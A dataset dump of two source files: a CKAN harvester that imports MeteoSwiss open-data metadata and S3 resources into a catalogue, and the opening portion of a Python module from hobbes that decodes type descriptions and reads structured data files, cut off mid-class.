repo_name (string) | path (string) | copies (class) | size (string) | content (string) | license (class) | hash (int64) | line_mean (float64) | line_max (int64) | alpha_frac (float64) | autogenerated (bool) |
---|---|---|---|---|---|---|---|---|---|---|
ogdch/ckanext-meteoswiss | ckanext/meteoswiss/harvesters/meteoswissharvester.py | 1 | 13076 | # -*- coding: utf-8 -*-
import json
import os
import tempfile
from uuid import NAMESPACE_OID, uuid4, uuid5
from boto.s3.connection import S3Connection
from boto.s3.key import Key
from ckan import model
from ckan.model import Session
from ckan.logic import get_action, action
from ckan.lib.munge import munge_title_to_name
from ckanext.harvest.model import HarvestObject
from ckanext.harvest.harvesters import HarvesterBase
from pylons import config
from ..helpers.metadata import MetaDataParser
import logging
log = logging.getLogger(__name__)
class MeteoswissHarvester(HarvesterBase):
'''
The harvester for meteoswiss
'''
HARVEST_USER = u'harvest'
METADATA_FILE_NAME = u'OGD@Bund_Metadaten_MeteoSchweiz_rig_V3 6.xlsx'
METADATA_FILE_PATH = (
u'ch.meteoschweiz.normwerttabellen/%s'
% METADATA_FILE_NAME
)
BUCKET_NAME = config.get('ckanext.meteoswiss.bucket_name')
AWS_ACCESS_KEY = config.get('ckanext.meteoswiss.access_key')
AWS_SECRET_KEY = config.get('ckanext.meteoswiss.secret_key')
SHEETS = (
# Sheet name # Use GM03 descriptions
(u'SMN', False),
(u'SMN-precip', False),
(u'Föhnindex', False),
(u'HomogeneDaten', False),
(u'Klimanormwerte', True),
#(u'Kamerabild', True),
)
S3_PREFIXES = {
u'SMN': 'ch.meteoschweiz.swissmetnet',
u'SMN-precip': 'ch.meteoschweiz.swissmetnet-niederschlag',
u'Föhnindex': 'ch.meteoschweiz.swissmetnet-foehnindex',
u'HomogeneDaten': 'ch.meteoschweiz.homogenereihen',
u'Klimanormwerte': 'ch.meteoschweiz.normwerttabellen',
u'Kamerabild': 'ch.meteoschweiz.kamerabilder',
}
ORGANIZATION = {
'de': {
'name': (
u'Bundesamt für Meteorologie '
u'und Klimatologie MeteoSchweiz'
),
'description': (
u'Der nationale Wetter- und Klimadienst. Messstationen, '
u'Wetterradars und Satelliten überwachen das Wetter. '
u'Aus den Messdaten erstellt MeteoSchweiz Prognosen, '
u'Warnungen und Klimaanalysen.'
),
'website': u'http://www.meteoschweiz.admin.ch/'
},
'fr': {
'name': (
u'Office fédéral de météorologie '
u'et de climatologie MétéoSuisse'
),
'description': (
u'Le service météorologique et climatologique national. '
u'A partir de l\'ensemble des stations de mesure, des '
u'radars météorologiques et des satellites MétéoSuisse '
u'élabore pronostics, alertes et analyse climatiques.'
)
},
'it': {
'name': (
u'Ufficio federale di meteorologia e '
u'climatologia MeteoSvizzera'
),
'description': (
u'Il servizio nazionale di meteorologia e climatologia. '
u'Sulla base di dati di stazioni di rilevamento, radar '
u'meteorologici e satelliti MeteoSvizzera elabora previsioni '
u'del tempo, allerte e le analisi climatologiche.'
)
},
'en': {
'name': (
u'Federal Office of Meteorology and '
u'Climatology MeteoSwiss'
),
'description': (
u'The national weather and climate service. Meteorological '
u'stations, weather radars and satellites monitor the '
u'weather. Using the collected data, MeteoSwiss generates '
u'forecasts, warnings and climate analyses.'
)
}
}
GROUPS = {
u'de': [u'Raum und Umwelt'],
u'fr': [u'Espace et environnement'],
u'it': [u'Territorio e ambiente'],
u'en': [u'Territory and environment']
}
def _get_s3_bucket(self):
'''
Create an S3 connection to the department bucket
'''
if not hasattr(self, '_bucket'):
try:
conn = S3Connection(self.AWS_ACCESS_KEY, self.AWS_SECRET_KEY)
self._bucket = conn.get_bucket(self.BUCKET_NAME)
except Exception, e:
log.exception(e)
raise e
return self._bucket
def _fetch_metadata_file(self):
'''
Fetch the Excel metadata file from the S3 bucket and save it on disk
'''
try:
temp_dir = tempfile.mkdtemp()
metadata_file = Key(self._get_s3_bucket())
metadata_file.key = self.METADATA_FILE_PATH
metadata_file_path = os.path.join(
temp_dir,
self.METADATA_FILE_NAME
)
metadata_file.get_contents_to_filename(metadata_file_path)
return metadata_file_path
except Exception, e:
log.exception(e)
raise
def _get_s3_resources(self, resources, s3_prefix):
'''
Look up all files on S3 and match them with their metadata descriptions
'''
result = []
for key in self._get_s3_bucket().list(s3_prefix):
path = key.name.split('/')
# Skip metadata file
if key.name == self.METADATA_FILE_PATH:
continue
if len(path) >= 2 and path[0] == s3_prefix and key.size > 0:
url = key.generate_url(0, query_auth=False, force_http=True)
name = os.path.basename(key.name)
data = {
u'url': url,
u'name': name,
u'format': self._guess_format(name),
}
description = self._description_lookup(resources, name)
if description:
data.update({u'description': description})
result.append(data)
return result
def _guess_format(self, path):
return os.path.splitext(path.lower())[1][1:]
def _description_lookup(self, resources, filename):
'''
Check whether the metadata file declared a description for this resource
'''
basename, ext = os.path.splitext(filename)
for resource in resources:
if basename in resource.get('id', ''):
return resource.get('description')
if basename in resource.get('Standort', ''):
return resource.get('description')
def info(self):
return {
'name': 'meteoswiss',
'title': 'Meteoswiss',
'description': 'Harvests the meteoswiss data',
'form_config_interface': 'Text'
}
def gather_stage(self, harvest_job):
log.debug('In Meteoswiss gather_stage')
file_path = self._fetch_metadata_file()
ids = []
for sheet_name, use_gm03_desc in self.SHEETS:
log.debug('Gathering %s' % sheet_name)
parser = MetaDataParser(file_path)
metadata = parser.parse_sheet(sheet_name, use_gm03_desc)
metadata['translations'].extend(self._metadata_term_translations())
metadata['sheet_name'] = sheet_name
obj = HarvestObject(
job=harvest_job,
content=json.dumps(metadata)
)
obj.save()
ids.append(obj.id)
return ids
def fetch_stage(self, harvest_object):
log.debug('In Meteoswiss fetch_stage')
package_dict = json.loads(harvest_object.content)
sheet_name = package_dict.get('sheet_name')
s3_prefix = self.S3_PREFIXES.get(sheet_name)
if s3_prefix:
log.debug('Loading S3 Resources for %s' % sheet_name)
package_dict['resources'] = self._get_s3_resources(
package_dict.get('resources', []),
s3_prefix
)
harvest_object.content = json.dumps(package_dict)
harvest_object.save()
return True
def _create_uuid(self, name=None):
'''
Create a new SHA-1 uuid for a given name or a random id
'''
if name:
new_uuid = uuid5(NAMESPACE_OID, str(name))
else:
new_uuid = uuid4()
return unicode(new_uuid)
def import_stage(self, harvest_object):
log.debug('In Meteoswiss import_stage')
if not harvest_object:
log.error('No harvest object received')
return False
try:
package_dict = json.loads(harvest_object.content)
user = model.User.get(self.HARVEST_USER)
context = {
'model': model,
'session': Session,
'user': self.HARVEST_USER
}
package_dict['id'] = self._create_uuid(package_dict.get('id'))
# Find or create group the dataset should get assigned to
package_dict['groups'] = self._find_or_create_groups(context)
# Find or create the organization
# the dataset should get assigned to
package_dict['owner_org'] = self._find_or_create_organization(
context
)
# because license_url does not exist, we save it in extras for now
extras = []
if 'licence_url' in package_dict:
extras.append(('license_url', package_dict['licence_url']))
elif 'license_url' in package_dict:
extras.append(('license_url', package_dict['license_url']))
package_dict['extras'] = extras
log.debug('Extras %s' % extras)
# Never import state from data source!
if 'state' in package_dict:
del package_dict['state']
# Split tags
tags = package_dict.get('tags', '').split(',')
tags = [tag.strip() for tag in tags]
if '' not in tags and '(tbd)' not in tags:
package_dict['tags'] = tags
else:
del package_dict['tags']
package = model.Package.get(package_dict['id'])
model.PackageRole(
package=package,
user=user,
role=model.Role.ADMIN
)
#log.debug('Save or update package %s' % (package_dict['name'],))
self._create_or_update_package(package_dict, harvest_object)
log.debug('Save or update term translations')
self._submit_term_translations(context, package_dict)
Session.commit()
except Exception, e:
log.exception(e)
raise e
return True
def _find_or_create_groups(self, context):
group_name = self.GROUPS['de'][0]
data_dict = {
'id': group_name,
'name': munge_title_to_name(group_name),
'title': group_name
}
try:
group = get_action('group_show')(context, data_dict)
except:
group = get_action('group_create')(context, data_dict)
log.info('created the group ' + group['id'])
group_ids = []
group_ids.append(group['id'])
return group_ids
def _find_or_create_organization(self, context):
try:
data_dict = {
'permission': 'edit_group',
'id': munge_title_to_name(self.ORGANIZATION['de']['name']),
'name': munge_title_to_name(self.ORGANIZATION['de']['name']),
'title': self.ORGANIZATION['de']['name'],
'description': self.ORGANIZATION['de']['description'],
'extras': [
{
'key': 'website',
'value': self.ORGANIZATION['de']['website']
}
]
}
organization = get_action('organization_show')(context, data_dict)
except:
organization = get_action('organization_create')(
context,
data_dict
)
return organization['id']
def _metadata_term_translations(self):
'''
Generate term translations for organizations
'''
try:
translations = []
for lang, org in self.ORGANIZATION.items():
if lang != 'de':
for field in ['name', 'description']:
translations.append({
'lang_code': lang,
'term': self.ORGANIZATION['de'][field],
'term_translation': org[field]
})
return translations
except Exception, e:
log.exception(e)
raise
def _submit_term_translations(self, context, package_dict):
for translation in package_dict['translations']:
action.update.term_translation_update(context, translation)
| agpl-3.0 | -5,317,946,303,690,557,000 | 32.14467 | 79 | 0.532353 | false |
Morgan-Stanley/hobbes | scripts/fregion.py | 1 | 33452 | #!/usr/bin/env python
########################################################
#
# fregion.py : read structured data files
#
# to load a file from the path P into the variable f:
# f = fregion.FRegion(P)
#
# to read the stored field 'x' out of f:
# f.x
#
# to read the 'metadata' for the field 'x' (type and offset details):
# meta(f).x
#
# There are 2 ways to add reading support for a custom user type:
# 1.
# fregion.FRegion.addType("MyTypeName", lambda renv, td, repty: makeMyTypeNameReader(renv,td,repty))
# where:
# 'renv' will be the "reader environment" (necessary for any call to makeReader)
# 'td' will be the full type description where "MyTypeName" appears at root (e.g. for 'fileref', App(Prim('fileref', ...), [Arr(Prim('char'))]))
# 'repty' will be the determined 'representation type' (which can also be determined through 'td')
# and:
# the returned 'reader' must be a class with a "read" function like:
# def read(self,m,o):
# where
# 'm' will give access to the memory for the file being read out of
# 'o' will be the memory offset where the value to be read is placed
# and:
# the returned value may be whatever the application decides is sensible
#
# 2. Just use the decorator RegReader like:
# @RegReader("MyTypeName")
# class MyTypeReader:
# def __init__(self, renv, ty, repty):
# pass
# def read(self, m, offset):
# pass
#
########################################################
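# A minimal usage sketch (the file path and field name below are hypothetical,
# shown only for illustration -- they are not part of this module):
#
# import fregion
# f = fregion.FRegion('/tmp/example.db') # open a structured data file
# print(meta(f)) # show stored fields with their types and offsets
# print(f.somefield) # read the stored field 'somefield'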
import os
import mmap
import struct
import math
import datetime
import uuid
import base64
#######
#
# useful tools
#
#######
class Loader:
"""
Lazy loading data from file
"""
def __init__(self, fn, *args, **kw):
self.fn = fn
self.args = args
self.kw = kw
def __getitem__(self, k):
if self.fn:
return self.fn(*self.args, **self.kw)[k]
return None
def __call__(self):
if self.fn:
v = self.fn(*self.args, **self.kw)
if isinstance(v, ArrReaderGenerator):
return v()
return v
return None
@property
def value(self):
if self.fn:
return self.fn(*self.args, **self.kw)
return None
def __str__(self):
return "{}".format(self.fn(*self.args, **self.kw))
def reader(self):
return self.fn.im_self
def LazyRead(enable):
"""
Decorator that makes a read function lazy: when enabled, calls return a Loader instead of the decoded value
"""
def apply(func):
def wrapper(*args, **kw):
return Loader(func, *args, **kw)
if enable:
return wrapper
else:
return func
return apply
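# Usage sketch (this is how UuidReader applies it further below): decorating a
# reader's read() with @LazyRead(True) makes calls return a Loader that defers
# decoding until the value is actually accessed, e.g.
#
# @LazyRead(True)
# def read(self, m, o):
# ... # body runs only when the returned Loader is dereferenced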
#######
#
# Type Descriptions
#
#######
class Prim:
def __init__(self, name, rep):
self.name = name
self.rep = rep
def __eq__(self,x): return isinstance(x,Prim) and self.name==x.name and self.rep==x.rep
def __repr__(self): return '()' if self.name=="unit" else self.name
class Var:
def __init__(self, name):
self.name = name
def __eq__(self,x): return isinstance(x,Var) and self.name==x.name
def __repr__(self): return self.name
class FixedArr:
def __init__(self, ty, tlen):
self.ty = ty
self.tlen = tlen
def __eq__(self,x): return isinstance(x,FixedArr) and self.ty==x.ty and self.tlen==x.tlen
def __repr__(self): return '[:' + str(self.ty) + '|' + str(self.tlen) + ':]'
class Arr:
def __init__(self, ty):
self.ty = ty
def __eq__(self,x): return isinstance(x,Arr) and self.ty==x.ty
def __repr__(self): return '[' + str(self.ty) + ']'
class Variant:
def __init__(self, ctors):
self.ctors = ctors
def __eq__(self,x): return isinstance(x,Variant) and self.ctors==x.ctors
def __repr__(self):
if (len(self.ctors) == 0):
return 'void'
elif (self.isSum()):
return self.showAsSum()
else:
return self.showAsVariant()
def isSum(self):
return len(self.ctors)>0 and self.ctors[0][0][0] == '.'
def showAsSum(self):
s = '('
s += str(self.ctors[0][2])
for i in range(1, len(self.ctors)):
s += '+' + str(self.ctors[i][2])
s += ')'
return s
def showAsVariant(self):
s = '|'
s += self.descCtor(self.ctors[0])
for i in range(1,len(self.ctors)):
s += ', '
s += self.descCtor(self.ctors[i])
s += '|'
return s
def descCtor(self, ctor):
return ctor[0] + ':' + str(ctor[2])
class Struct:
def __init__(self, fields):
self.fields = fields
def __eq__(self,x): return isinstance(x,Struct) and self.fields==x.fields
def __repr__(self):
if (len(self.fields) == 0):
return '()'
elif (self.isTuple()):
return self.showAsTuple()
else:
return self.showAsStruct()
def isTuple(self):
return len(self.fields)>0 and self.fields[0][0][0] == '.'
def showAsTuple(self):
s = '('
s += str(self.fields[0][2])
for i in range(1,len(self.fields)):
s += '*' + str(self.fields[i][2])
s += ')'
return s
def showAsStruct(self):
s = '{'
s += self.descField(self.fields[0])
for i in range(1,len(self.fields)):
s += ', '
s += self.descField(self.fields[i])
s += '}'
return s
def descField(self, field):
return field[0] + ':' + str(field[2])
class TLong:
def __init__(self, n):
self.n = n
def __eq__(self,x): return isinstance(x,TLong) and self.n==x.n
def __repr__(self): return str(self.n)
class App:
def __init__(self,f,args):
self.f = f
self.args = args
def __eq__(self,x): return isinstance(x,App) and self.f==x.f and self.args==x.args
def __repr__(self):
if (isinstance(self.f,Prim)):
if (self.f.name == "fileref" and len(self.args)>0):
return str(self.args[0])+"@?"
return self.showGeneric()
def showGeneric(self):
s = str(self.f) + '('
if (len(self.args)>0):
s += str(self.args[0])
for i in range(1,len(self.args)):
s += ', ' + str(self.args[i])
s += ')'
return s
class Recursive:
def __init__(self,vn,ty):
self.vn = vn
self.ty = ty
def __repr__(self):
return '^' + self.vn + '.' + str(self.ty)
class Abs:
def __init__(self,vns,ty):
self.vns = vns
self.ty = ty
def __repr__(self):
s = '\\'
if (len(self.vns)>0):
s += self.vns[0]
for i in range(1,len(self.vns)):
s += ', ' + self.vns[i]
s += '.' + str(self.ty)
return s
class TyCase:
def __init__(self, dtors):
self.dtors = dtors
def apply(self,ty):
if (isinstance(ty,Prim)):
return self.dtors["prim"](ty)
elif (isinstance(ty,Var)):
return self.dtors["var"](ty)
elif (isinstance(ty,FixedArr)):
return self.dtors["farr"](ty)
elif (isinstance(ty,Arr)):
return self.dtors["arr"](ty)
elif (isinstance(ty,Variant)):
return self.dtors["variant"](ty)
elif (isinstance(ty,Struct)):
return self.dtors["struct"](ty)
elif (isinstance(ty,TLong)):
return self.dtors["long"](ty)
elif (isinstance(ty,App)):
return self.dtors["app"](ty)
elif (isinstance(ty,Recursive)):
return self.dtors["rec"](ty)
elif (isinstance(ty,Abs)):
return self.dtors["abs"](ty)
else:
raise Exception("Can't deconstruct unknown type description")
def fail(msg):
raise Exception(msg)
def dictWithout(m,k):
r=m.copy()
r.pop(k,None)
return r
def dictWithouts(m,ks):
r=m.copy()
for k in ks:
r.pop(k,None)
return r
def addFreeVar(m,vn):
m[vn]=None
def freeVarsInto(m,ty):
tyDisp = {
"prim": lambda p: None,
"var": lambda v: addFreeVar(m,v.name),
"farr": lambda fa: (freeVarsInto(m,fa.ty), freeVarsInto(m,fa.tlen)),
"arr": lambda a: freeVarsInto(m,a.ty),
"variant": lambda v: [freeVarsInto(m,ctor[2]) for ctor in v.ctors],
"struct": lambda s: [freeVarsInto(m,field[2]) for field in s.fields],
"long": lambda n: None,
"app": lambda a: (freeVarsInto(m,a.f), [freeVarsInto(m,arg) for arg in f.args]),
"rec": lambda r: m.update(dictWithout(freeVars(r.ty),r.vn)),
"abs": lambda a: m.update(dictWithouts(freeVars(a.ty),a.vns))
}
return TyCase(tyDisp).apply(ty)
def freeVars(ty):
m={}
freeVarsInto(m,ty)
return m
def dictFreeVars(m):
lm={}
for n, ty in m.items():
freeVarsInto(lm,ty)
return lm
def freeName(m):
vn='t0'
n=0
while (True):
if (not(vn in m)):
break
else:
n+=1
vn='t'+str(n)
return vn
def substituteInVariant(m,v):
ctors=[]
for ctor in v.ctors:
ctors.append((ctor[0], ctor[1], substitute(m, ctor[2])))
return Variant(ctors)
def substituteInStruct(m,s):
fields=[]
for field in s.fields:
fields.append((field[0], field[1], substitute(m,field[2])))
return Struct(fields)
def substituteInApp(m,a):
args=[]
for ty in a.args:
args.append(substitute(m,ty))
return App(substitute(m,a.f),args)
def substituteInRec(m,r):
lm=dictWithout(m,r.vn)
fvs=dictFreeVars(lm)
if (r.vn in fvs):
nn=freeName(fvs)
return Recursive(nn, substitute(lm, substitute({r.vn:Var(nn)},r.ty)))
else:
return Recursive(r.vn, substitute(lm, r.ty))
def substituteInAbs(m,a):
lm=dictWithouts(m,a.vns)
fvs=dictFreeVars(lm)
vns=[]
for vn in a.vns:
if (vn in fvs):
nn=freeName(lm)
lm[vn] = Var(nn)
vns.append(nn)
else:
vns.append(vn)
if (vns!=a.vns):
return Abs(vns, substitute(lm,a.ty))
else:
return Abs(a.vns, substitute(lm,a.ty))
def substitute(m,ty):
tyDisp = {
"prim": lambda p: Prim(p.name,substitute(m,p.rep)) if (p.rep != None) else p,
"var": lambda v: m[v.name] if (v.name in m.keys()) else v,
"farr": lambda fa: FixedArr(substitute(m,fa.ty), substitute(m,fa.tlen)),
"arr": lambda a: Arr(substitute(m,a.ty)),
"variant": lambda v: substituteInVariant(m,v),
"struct": lambda s: substituteInStruct(m,s),
"long": lambda n: n,
"app": lambda a: substituteInApp(m,a),
"rec": lambda r: substituteInRec(m,r),
"abs": lambda a: substituteInAbs(m,a)
}
return TyCase(tyDisp).apply(ty)
def expectFn(ty):
if (isinstance(ty,Prim)):
if (ty.rep == None):
if (ty.name == "fileref"):
return Abs(["t"], Prim("long",None))
else:
raise Exception("Expected function representation in place of primitive: " + ty.name)
else:
return expectFn(ty.rep)
elif (isinstance(ty,Abs)):
return ty
else:
raise Exception("Expected function in place of type: " + str(ty))
def evalApp(pf, args):
f = expectFn(pf)
if (len(args)!=len(f.vns)):
raise Exception("Arity mismatch in application (expected " + str(len(f.vns)) + " arguments): " + str(App(pf,args)))
m={}
for i in range(len(f.vns)):
m[f.vns[i]] = args[i]
return substitute(m, f.ty)
#######
#
# determine memory layout of any type
#
#######
def align(x, b):
if (x % b == 0):
return x
else:
return b*(int(x/b)+1)
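# For example: align(5, 4) == 8, align(8, 4) == 8 and align(1, 8) == 8 -- an
# offset is rounded up to the next multiple of the alignment boundary.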
def alignOfStruct(s):
a=1
for field in s.fields:
a=max(a,alignOf(field[2]))
return a
def alignOfVariant(v):
a=4
for ctor in v.ctors:
a=max(a,alignOf(ctor[2]))
return a
def alignOfApp(a):
return alignOf(evalApp(a.f, a.args))
def alignOf(ty):
tyDisp = {
"prim": lambda p: 1 if (p.name == "unit") else alignOf(p.rep) if (p.rep != None) else sizeOfPrim(p),
"var": lambda v: fail("Can't determine alignment of type variable: " + v.name),
"farr": lambda fa: alignOf(fa.ty),
"arr": lambda a: fail("Can't determine alignment of variable-length array: " + str(a)),
"variant": lambda v: alignOfVariant(v),
"struct": lambda s: alignOfStruct(s),
"long": lambda n: fail("Can't get alignment of type-level number: " + str(n.n)),
"app": lambda a: alignOfApp(a),
"rec": lambda r: fail("Can't get alignment of recursive type: " + str(r)),
"abs": lambda a: fail("Can't get alignment of type-level function: " + str(a))
}
return TyCase(tyDisp).apply(ty)
def sizeOfPrim(p):
if (p.rep != None):
return sizeOf(p.rep)
else:
if (p.name == "unit"):
return 0
elif (p.name == "bool"):
return 1
elif (p.name == "byte"):
return 1
elif (p.name == "char"):
return 1
elif (p.name == "short"):
return 2
elif (p.name == "int"):
return 4
elif (p.name == "long"):
return 8
elif (p.name == "float"):
return 4
elif (p.name == "double"):
return 8
else:
raise Exception("Can't determine size of unknown primitive type: " + p.name)
def sizeOfStruct(s):
o=0
for f in s.fields:
o = align(o, alignOf(f[2])) + sizeOf(f[2])
return align(o, alignOf(s))
def sizeOfVariant(v):
a=alignOf(v)
maxsz=0
for ctor in v.ctors:
maxsz=max(maxsz,sizeOf(ctor[2]))
return align(align(4,a)+maxsz,a)
def sizeOfApp(a):
return sizeOf(evalApp(a.f, a.args))
def sizeOf(ty):
tyDisp = {
"prim": lambda p: sizeOfPrim(p),
"var": lambda v: fail("Can't determine size of type variable: " + v.name),
"farr": lambda fa: sizeOf(fa.ty)*fa.tlen.n,
"arr": lambda a: fail("Can't determine size of variable-length array: " + str(a)),
"variant": lambda v: sizeOfVariant(v),
"struct": lambda s: sizeOfStruct(s),
"long": lambda n: fail("Can't get size of type-level number: " + str(n.n)),
"app": lambda a: sizeOfApp(a),
"rec": lambda r: fail("Can't get size of recursive type: " + str(r)),
"abs": lambda a: fail("Can't get size of type-level function: " + str(a))
}
return TyCase(tyDisp).apply(ty)
#######
#
# Type Description Decoding
#
#######
# a cheap cursor
class ReadPos:
def __init__(self):
self.pos = 0
def __repr__(self): return str(self.pos)
# type descriptions
TYCTOR_PRIM = 0
TYCTOR_TVAR = 2
TYCTOR_FIXEDARR = 4
TYCTOR_ARR = 5
TYCTOR_VARIANT = 6
TYCTOR_STRUCT = 7
TYCTOR_SIZE = 11
TYCTOR_TAPP = 12
TYCTOR_RECURSIVE = 13
TYCTOR_TABS = 15
def decodeBool(d, p):
b = struct.unpack('B', d[p.pos:p.pos+1])[0]
p.pos += 1
return b != 0
def decodeInt(d, p):
n = struct.unpack('I', d[p.pos:p.pos+4])[0]
p.pos += 4
return n
def decodeLong(d, p):
n = struct.unpack('Q', d[p.pos:p.pos+8])[0]
p.pos += 8
return n
def decodeStr(d, p):
n = decodeLong(d,p)
s = str(d[p.pos:p.pos+n])
p.pos += n
return s
def decodeTypeDesc(d, p):
c = decodeInt(d,p)
if (c == TYCTOR_PRIM):
name = decodeStr(d, p)
if (decodeBool(d, p)):
return Prim(name, decodeTypeDesc(d, p))
else:
return Prim(name, None)
elif (c == TYCTOR_TVAR):
name = decodeStr(d, p)
return Var(name)
elif (c == TYCTOR_FIXEDARR):
ty = decodeTypeDesc(d, p)
tlen = decodeTypeDesc(d, p)
return FixedArr(ty, tlen)
elif (c == TYCTOR_ARR):
ty = decodeTypeDesc(d, p)
return Arr(ty)
elif (c == TYCTOR_VARIANT):
n = decodeLong(d,p)
ctors = []
for i in range(n):
name = decodeStr(d,p)
cid = decodeInt(d,p)
ty = decodeTypeDesc(d,p)
ctors.append((name,cid,ty))
return Variant(ctors)
elif (c == TYCTOR_STRUCT):
n = decodeLong(d,p)
fields = []
for i in range(n):
name = decodeStr(d,p)
cid = decodeInt(d,p)
ty = decodeTypeDesc(d,p)
fields.append((name,cid,ty))
return Struct(fields)
elif (c == TYCTOR_SIZE):
return TLong(decodeLong(d,p))
elif (c == TYCTOR_TAPP):
f = decodeTypeDesc(d,p)
n = decodeLong(d,p)
args = []
for i in range(n):
args.append(decodeTypeDesc(d,p))
return App(f,args)
elif (c == TYCTOR_RECURSIVE):
vn = decodeStr(d,p)
ty = decodeTypeDesc(d,p)
return Recursive(vn,ty)
elif (c == TYCTOR_TABS):
n = decodeLong(d,p)
vns = []
for i in range(n):
vns.append(decodeStr(d,p))
ty = decodeTypeDesc(d,p)
return Abs(vns,ty)
else:
raise Exception('Not a supported type constructor ID: ' + str(c))
#######
#
# Version updates as type transforms (where possible)
#
#######
def V1toV2Type(ty):
tyDisp = {
"prim": lambda p: p if (p.rep == None) else Prim(p.name, V1toV2Type(p.rep)),
"var": lambda v: v,
"farr": lambda fa: FixedArr(V1toV2Type(fa.ty), V1toV2Type(fa.tlen)),
"arr": lambda a: App(Prim("darray", Abs(["t"], Prim("long", None))), [V1toV2Type(a.ty)]),
"variant": lambda v: Variant([(ctor[0], ctor[1], V1toV2Type(ctor[2])) for ctor in v.ctors]),
"struct": lambda s: Struct([(field[0], field[1], V1toV2Type(field[2])) for field in s.fields]),
"long": lambda n: n,
"app": lambda a: App(V1toV2Type(a.f), [V1toV2Type(arg) for arg in a.args]),
"rec": lambda r: Recursive(r.vn, V1toV2Type(r.ty)),
"abs": lambda a: Abs(a.vns, V1toV2Type(a.ty))
}
return TyCase(tyDisp).apply(ty)
#######
#
# File envelope decoding (read page data, environment data)
#
#######
# page entry decoding
def isEnvPage(p):
return (p >> 14) == 2
def availBytes(p):
return p & 0x3FFF
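# For example, a page entry of 0x8005 has its top two bits equal to 2 and its
# low 14 bits equal to 5, so isEnvPage(0x8005) is True and availBytes(0x8005) == 5.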
# a file variable definition
class EnvEntry:
def __init__(self, offset, ty):
self.offset = offset
self.ty = ty
def __repr__(self):
return str(self.ty) + "@" + str(self.offset)
# read file metadata
class FREnvelope:
def __init__(self, fpath):
self.p = fpath
self.f = open(self.p, 'r+b')
self.m = mmap.mmap(self.f.fileno(), 0, mmap.ACCESS_READ)
# make sure that the file header is what we expect
if (struct.unpack('I', self.m[0:4])[0] != 0x10A1DB0D):
raise Exception('Not a valid structured data file: ' + self.p)
self.pageSize = struct.unpack('H', self.m[4:6])[0]
self.version = struct.unpack('H', self.m[6:8])[0]
if (self.pageSize != 4096):
raise Exception('Expected 4K page size')
if (not(self.version in [1,2])):
raise Exception('Structured data file format version ' + str(self.version) + ' not supported')
# read the page data in this file
self.pages = []
self.readPageEntries(self.pages, 8, 4096)
# read the environment data in this file
self.env = dict([])
page=0
while (page < len(self.pages)):
if (isEnvPage(self.pages[page])):
page += self.readEnvPage(self.env, page)
else:
page += 1
# if reading the old format, we need to reinterpret recorded types
if (self.version == 1):
for vn, b in self.env.items():
b.ty = V1toV2Type(b.ty)
# read page data entries into the 'pages' argument
# if there is a link to a subsequent page to read page data from, follow it
def readPageEntries(self, pages, i, o):
k = i
e = o - 8
while (k < e):
p = struct.unpack('H', self.m[k:k+2])[0]
if (p == 0):
break
pages.append(p)
k += 2
n = struct.unpack('Q', self.m[e:e+8])[0]
if (n != 0):
self.readPageEntries(pages, n*4096, (n+1)*4096)
# read environment data into the 'env' argument out of 'page'
def readEnvPage(self, env, page):
initOffset = page * 4096
offset = initOffset
while (True):
offset = self.readEnvRecord(env, offset)
pos = offset - 1
tpage = int(pos / 4096)
rpos = (pos % 4096) + 1
if (rpos == (4096 - availBytes(self.pages[tpage]))):
break
return int(math.ceil((float(offset-initOffset))/4096.0))
def readEnvRecord(self, env, offset):
vpos = struct.unpack('Q', self.m[offset:offset+8])[0]
offset += 8
vnlen = struct.unpack('Q', self.m[offset:offset+8])[0]
offset += 8
vn = str(self.m[offset:offset+vnlen])
offset += vnlen
tylen = struct.unpack('Q', self.m[offset:offset+8])[0]
offset += 8
if (len(vn) > 0 and vn[0] != '.' and tylen > 0):
env[vn] = EnvEntry(vpos, decodeTypeDesc(self.m[offset:offset+tylen], ReadPos()))
offset += tylen
return offset
#######
#
# Read structured data
#
#######
class UnitReader:
def read(self,m,offset): return None
class UnpackReader:
def __init__(self,fmt,sz):
self.fmt = fmt
self.sz = sz
def read(self,m,offset):
return struct.unpack(self.fmt,m[offset:offset+self.sz])[0]
class FArrReader:
def __init__(self, renv, ty, c):
self.c = c
self.rdr = makeReader(renv, ty)
self.esz = sizeOf(ty)
def read(self,m,offset):
r=[]
o=offset
for i in range(self.c):
r.append(self.rdr.read(m,o))
o += self.esz
return r
def tupleReaders(renv, tys):
o = 0
os = []
rs = []
for ty in tys:
o = align(o, alignOf(ty))
os.append(o)
rs.append(makeReader(renv, ty))
o += sizeOf(ty)
return (os,rs)
class TupleReader:
def __init__(self, renv, tys):
os, rs = tupleReaders(renv, tys)
self.os = os
self.rs = rs
def read(self,m,offset):
vs=[]
for i in range(len(self.os)):
vs.append(self.rs[i].read(m,offset+self.os[i]))
return tuple(vs)
class StructView:
def __init__(self, fs, foffs, vs):
self.fs = fs
self.foffs = foffs
self.vs = vs
def __repr__(self):
r = '{'
if (len(self.vs)>0):
r += self.fs[0] + '=' + str(self.vs[0])
for i in range(1,len(self.vs)):
r += ', ' + self.fs[i] + '=' + str(self.vs[i])
r += '}'
return r
def __str__(self): return self.__repr__()
def __eq__(self,other):
if (not(isinstance(other,StructView))):
return False
else:
return self.fs == other.fs and self.vs == other.vs
def __getattr__(self, attr):
return self.vs[self.foffs[attr]].value
class StructReader:
def __init__(self, renv, fs, tys):
os, rs = tupleReaders(renv, tys)
self.fs = fs
self.os = os
self.rs = rs
foffs={}
for i in range(len(self.fs)):
foffs[self.fs[i]] = i
self.foffs = foffs
def read(self,m,offset):
vs=[]
for i in range(len(self.os)):
vs.append(Loader(self.rs[i].read ,m,offset+self.os[i]))
return StructView(self.fs, self.foffs, vs)
class MaybeReader:
def __init__(self, renv, ty):
self.poff = align(4, alignOf(ty))
self.tr = UnpackReader('I', 4)
self.jr = makeReader(renv, ty)
def read(self,m,offset):
t = self.tr.read(m,offset)
if (t == 0):
return None
else:
return self.jr.read(m,offset+self.poff)
class EnumView:
def __init__(self, ns, t):
self.ns = ns
self.t = t
def __repr__(self):
return '|' + str(self.ns.get(self.t)) + '|'
class EnumReader:
def __init__(self, ctors):
self.tr = UnpackReader('I',4)
ns={}
for ctor in ctors:
ns[ctor[1]] = ctor[0]
self.ns = ns
def read(self,m,offset):
t = self.tr.read(m,offset)
return EnumView(self.ns, t)
class VariantView:
def __init__(self, cn, value):
self.cn = cn
self.v = value
@property
def value(self):
return self.v()
def __repr__(self):
if (len(self.cn)>0 and self.cn[0] == '.'):
return "|" + self.cn[2:] + "=" + str(self.v) + "|"
else:
return "|" + self.cn + "=" + str(self.v) + "|"
class VariantReader:
def __init__(self, renv, ctors):
poff=4
crs={}
cns={}
for ctor in ctors:
